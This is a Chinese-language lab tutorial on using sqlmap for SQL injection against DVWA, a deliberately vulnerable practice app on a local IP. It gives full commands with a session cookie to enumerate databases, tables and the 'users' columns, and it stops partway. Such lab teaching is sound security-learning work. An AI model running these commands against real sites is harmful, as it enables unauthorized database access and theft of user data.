一起学安全测试——用sqlmap对dvwa实现SQL注入测试

sqlmap是一款进行SQL注入的工具，非常简单好用。我们在dvwa上试着用sqlmap实现注入，拿到数据库的信息。

1. 搭建dvwa环境并启动。
2. windows上需要搭建Python环境，下载sqlmap包并解压。kali linux自带（之后演示在kali上）。
3. 设置dvwa级别为low（medium，high都可以，不要设成impossible就行）
4. 打开dvwa的SQL Injection，打开浏览器调试，输入user id并submit，查看拦截到的请求。
5. 可以看到是一条GET请求，url是“http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”，cookie里有”security=low; PHPSESSID=0nm9krnrptlt5v6ahockigke62”
6. 我们先只用url试试

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

结果是跳转到登录页面，看来是需要带cookie的
7. 这次我们加上cookie

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62"

这次看样子成功了，但是中间会不断需要输入y/n
8. 我们在后面加上参数--batch

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch

sqlmap会为我们自动填写执行了
9. 接下来我们用--dbs获取其所有的数据库

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch --dbs

10. 我们用-D xxx指定查看的数据库，用--tables查看该数据库的所有表

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa --tables

11. 我们用-D xxx -T ttt指定查看的表，用--columns查看表的列

sqlmap -u "http://192.168.7.28/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa -T users --columns

….待续….